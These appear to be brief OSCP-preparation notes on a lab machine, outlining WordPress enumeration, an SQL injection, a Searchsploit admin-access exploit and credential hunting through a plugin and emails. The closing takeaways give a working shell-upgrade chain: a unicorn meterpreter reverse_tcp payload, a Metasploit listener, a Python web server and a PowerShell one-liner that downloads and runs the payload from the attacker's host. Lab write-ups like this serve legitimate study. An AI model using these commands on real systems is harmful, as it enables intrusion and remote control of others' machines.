- Nmap
- SSL Enum -> Add hostnames to
/etc/hosts
. - WPscan -> authenticated sql Injection.
- WPScan enumerate users.
- Searchsploit -> Unauthenticated Admin access
- Use exploit html, edit URLs and exploit the vuln.
- Login as Admin
- Find user SMTP Password in Plugin.
- Setup SMTP Client and read emails.
- Credentials to Forum in Emails.
- Find encrypted Forum Entries.
Takeaways
- Check SSL Information in Browser for e.g. Emails. And Add Hostnames to
/etc/hosts
. - Use Burp Suite Redirect Proxy set on 127.0.0.1 to point to remote host.
- Use devtools to uncover censored passwords.
Take aways:
Use Unicorn to upgrade shells
unicorn windows/meterpreter/reverse_tcp $local_ip $local_port
This will generate one rc file for msf and one powershell script.
Start metasploit:
msfconsole -r unicorn.rc
Cut the powershell payload to only the part in double quotes and save in shell.html
Start a local webserver to serve file.
python -m http.server 80
Execute in windows console
powershell "IEX(New-Object Net.WebClient).downloadString('http://$IP/shell.html')"
Thank you for your work which is making the oscp preparation an awesome experience.